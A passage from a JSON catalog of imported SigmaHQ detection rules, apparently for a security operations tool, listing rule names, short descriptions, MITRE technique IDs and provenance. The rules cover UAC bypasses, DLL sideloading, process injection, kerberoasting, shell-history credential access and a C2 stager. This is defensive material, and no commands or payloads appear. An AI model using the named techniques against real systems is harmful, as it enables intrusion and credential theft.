"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml" } }, { "id": "sigmahq-sigma-4f154fb6-27d1-4813-a759-78b93e0b9c48", "type": "detection", "name": "Operator Bloopers Cobalt Strike Modules", "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/operator-bloopers-cobalt-strike-modules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" } }, { "id": "sigmahq-sigma-4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6", "type": "detection", "name": "Potential Homoglyph Attack Using Lookalike Characters in Filename", "description": "Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.\nThis is used as an obfuscation and masquerading techniques. Only \"perfect\" homoglyphs are included; these are characters that\nare indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-homoglyph-attack-using-lookalike-characters-in-filename.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_homoglyph_filename.yml" } }, { "id": "sigmahq-sigma-4f281b83-0200-4b34-bf35-d24687ea57c2", "type": "detection", "name": "ETW Logging Disabled For SCM", "description": "Detects changes to the \"TracingDisabled\" key in order to disable ETW logging for services.exe (SCM)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/etw-logging-disabled-for-scm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f281b83-0200-4b34-bf35-d24687ea57c2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml" } }, { "id": "sigmahq-sigma-4f2cd9b6-4a17-440f-bb2a-687abb65993a", "type": "detection", "name": "Uncommon AddinUtil.EXE CommandLine Execution", "description": "Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-addinutil-exe-commandline-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f2cd9b6-4a17-440f-bb2a-687abb65993a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml" } }, { "id": "sigmahq-sigma-4f647cfa-b598-4e12-ad69-c68dd16caef8", "type": "detection", "name": "DumpStack.log Defender Evasion", "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dumpstack-log-defender-evasion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml" } }, { "id": "sigmahq-sigma-4f6c43e2-f989-4ea5-bcd8-843b49a0317c", "type": "detection", "name": "UAC Bypass Using WOW64 Logger DLL Hijack", "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-wow64-logger-dll-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml" } }, { "id": "sigmahq-sigma-4f6edb78-5c21-42ab-a558-fd2a6fc1fd57", "type": "detection", "name": "Potential 7za.DLL Sideloading", "description": "Detects potential DLL sideloading of \"7za.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-7za-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f6edb78-5c21-42ab-a558-fd2a6fc1fd57", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_7za.yml" } }, { "id": "sigmahq-sigma-4f73421b-5a0b-4bbf-a892-5a7fb99bea66", "type": "detection", "name": "Mavinject Inject DLL Into Running Process", "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055.001", "T1218.013" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mavinject-inject-dll-into-running-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" } }, { "id": "sigmahq-sigma-4f77e1d7-3982-4ee0-8489-abf2d6b75284", "type": "detection", "name": "Sign-ins from Non-Compliant Devices", "description": "Monitor and alert for sign-ins where the device was non-compliant.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sign-ins-from-non-compliant-devices.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f77e1d7-3982-4ee0-8489-abf2d6b75284", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_noncompliant_devices.yml" } }, { "id": "sigmahq-sigma-4f7a6757-ff79-46db-9687-66501a02d9ec", "type": "detection", "name": "Active Directory Structure Export Via Ldifde.EXE", "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/active-directory-structure-export-via-ldifde-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f7a6757-ff79-46db-9687-66501a02d9ec", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ldifde_export.yml" } }, { "id": "sigmahq-sigma-4f84b697-c9ed-4420-8ab5-e09af5b2345d", "type": "detection", "name": "New DLL Added to AppInit_DLLs Registry Key", "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-dll-added-to-appinit-dlls-registry-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" } }, { "id": "sigmahq-sigma-4fc0deee-0057-4998-ab31-d24e46e0aba4", "type": "detection", "name": "Potential System DLL Sideloading From Non System Locations", "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-system-dll-sideloading-from-non-system-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_from_non_system_location.yml" } }, { "id": "sigmahq-sigma-4fd6b1c7-19b8-4488-97f6-00f0924991a3", "type": "detection", "name": "PUA - NimScan Execution", "description": "Detects usage of NimScan, a portscanner utility.\nIn early 2025, adversaries were observed using this utility to scan for open ports on remote hosts in a compromised environment.\nThis rule identifies the execution of NimScan based on the process image name and specific hash values associated with different versions of the tool.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-nimscan-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4fd6b1c7-19b8-4488-97f6-00f0924991a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_nimscan.yml" } }, { "id": "sigmahq-sigma-4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", "type": "detection", "name": "Powershell LocalAccount Manipulation", "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-localaccount-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_localuser.yml" } }, { "id": "sigmahq-sigma-4fe074b4-b833-4081-8f24-7dcfeca72b42", "type": "detection", "name": "Security Tools Keyword Lookup Via Findstr.EXE", "description": "Detects execution of \"findstr\" to search for common names of security tools. Attackers often pipe the results of recon commands such as \"tasklist\" or \"whoami\" to \"findstr\" in order to filter out the results.\nThis detection focuses on the keywords that the attacker might use as a filter.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1518.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-tools-keyword-lookup-via-findstr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4fe074b4-b833-4081-8f24-7dcfeca72b42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml" } }, { "id": "sigmahq-sigma-4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", "type": "detection", "name": "MSExchange Transport Agent Installation - Builtin", "description": "Detects the Installation of a Exchange Transport Agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/msexchange-transport-agent-installation-builtin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/msexchange/win_exchange_transportagent.yml" } }, { "id": "sigmahq-sigma-4fe17521-aef3-4e6a-9d6b-4a7c8de155a8", "type": "detection", "name": "OpenCanary - GIT Clone Request", "description": "Detects instances where a GIT service on an OpenCanary node has had Git Clone request.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1213" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-git-clone-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4fe17521-aef3-4e6a-9d6b-4a7c8de155a8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_git_clone_request.yml" } }, { "id": "sigmahq-sigma-4fee3d51-8069-4a4c-a0f7-924fcaff2c70", "type": "detection", "name": "FileFix - Command Evidence in TypedPaths", "description": "Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/filefix-command-evidence-in-typedpaths.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4fee3d51-8069-4a4c-a0f7-924fcaff2c70", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_filefix_typedpath_commands.yml" } }, { "id": "sigmahq-sigma-502b42de-4306-40b4-9596-6f590c81f073", "type": "detection", "name": "Local Accounts Discovery", "description": "Local accounts, System Owner/User discovery using operating systems utilities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1033", "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-accounts-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "502b42de-4306-40b4-9596-6f590c81f073", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml" } }, { "id": "sigmahq-sigma-503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "type": "detection", "name": "UAC Bypass Using ChangePK and SLUI", "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-changepk-and-slui.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" } }, { "id": "sigmahq-sigma-503fe26e-b5f2-4944-a126-eab405cc06e5", "type": "detection", "name": "Kerberos Network Traffic RC4 Ticket Encryption", "description": "Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kerberos-network-traffic-rc4-ticket-encryption.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "503fe26e-b5f2-4944-a126-eab405cc06e5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_susp_kerberos_rc4.yml" } }, { "id": "sigmahq-sigma-504d63cb-0dba-4d02-8531-e72981aace2c", "type": "detection", "name": "Suspicious X509Enrollment - Ps Script", "description": "Detect use of X509Enrollment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-x509enrollment-ps-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "504d63cb-0dba-4d02-8531-e72981aace2c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml" } }, { "id": "sigmahq-sigma-508a9374-ad52-4789-b568-fc358def2c65", "type": "detection", "name": "Suspicious History File Operations", "description": "Detects commandline operations on shell history files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-history-file-operations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "508a9374-ad52-4789-b568-fc358def2c65", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml" } }, { "id": "sigmahq-sigma-50919691-7302-437f-8e10-1fe088afa145", "type": "detection", "name": "Regsvr32 DLL Execution With Uncommon Extension", "description": "Detects a \"regsvr32\" execution where the DLL doesn't contain a common file extension.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/regsvr32-dll-execution-with-uncommon-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50919691-7302-437f-8e10-1fe088afa145", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml" } }, { "id": "sigmahq-sigma-509e84b9-a71a-40e0-834f-05470369bd1e", "type": "detection", "name": "Default RDP Port Changed to Non Standard Port", "description": "Detects changes to the default RDP port.\nRemote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/default-rdp-port-changed-to-non-standard-port.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "509e84b9-a71a-40e0-834f-05470369bd1e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_change_rdp_port.yml" } }, { "id": "sigmahq-sigma-50a0aa3d-ab16-4594-a8aa-5145a6e6792b", "type": "detection", "name": "Python One-Liners with Base64 Decoding", "description": "Detects Python one-liners that use base64 decoding functions in command line executions.\nMalicious scripts or attackers often use python one-liners to decode and execute base64-encoded payloads, which is a common technique for obfuscation and evasion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.006", "T1027.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-one-liners-with-base64-decoding.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50a0aa3d-ab16-4594-a8aa-5145a6e6792b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_python_base64_encoded_execution.yml" } }, { "id": "sigmahq-sigma-50a3c7aa-ec29-44a4-92c1-fce229eef6fc", "type": "detection", "name": "CA Policy Updated by Non Approved Actor", "description": "Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare \"old\" vs \"new\" value.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548", "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ca-policy-updated-by-non-approved-actor.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50a3c7aa-ec29-44a4-92c1-fce229eef6fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_updatedby_bad_actor.yml" } }, { "id": "sigmahq-sigma-50cb47b8-2c33-4b23-a2e9-4600657d9746", "type": "detection", "name": "Loading Diagcab Package From Remote Path", "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/loading-diagcab-package-from-remote-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml" } }, { "id": "sigmahq-sigma-50d66fb0-03f8-4da0-8add-84e77d12a020", "type": "detection", "name": "Suspicious RunAs-Like Flag Combination", "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-runas-like-flag-combination.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50d66fb0-03f8-4da0-8add-84e77d12a020", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml" } }, { "id": "sigmahq-sigma-50e068d7-1e6b-4054-87e5-0a592c40c7e0", "type": "detection", "name": "Okta MFA Reset or Deactivated", "description": "Detects when an attempt at deactivating or resetting MFA.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-mfa-reset-or-deactivated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50e068d7-1e6b-4054-87e5-0a592c40c7e0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_mfa_reset_or_deactivated.yml" } }, { "id": "sigmahq-sigma-50e54b8d-ad73-43f8-96a1-5191685b17a4", "type": "detection", "name": "Silenttrinity Stager Msbuild Activity", "description": "Detects a possible remote connections to Silenttrinity c2", 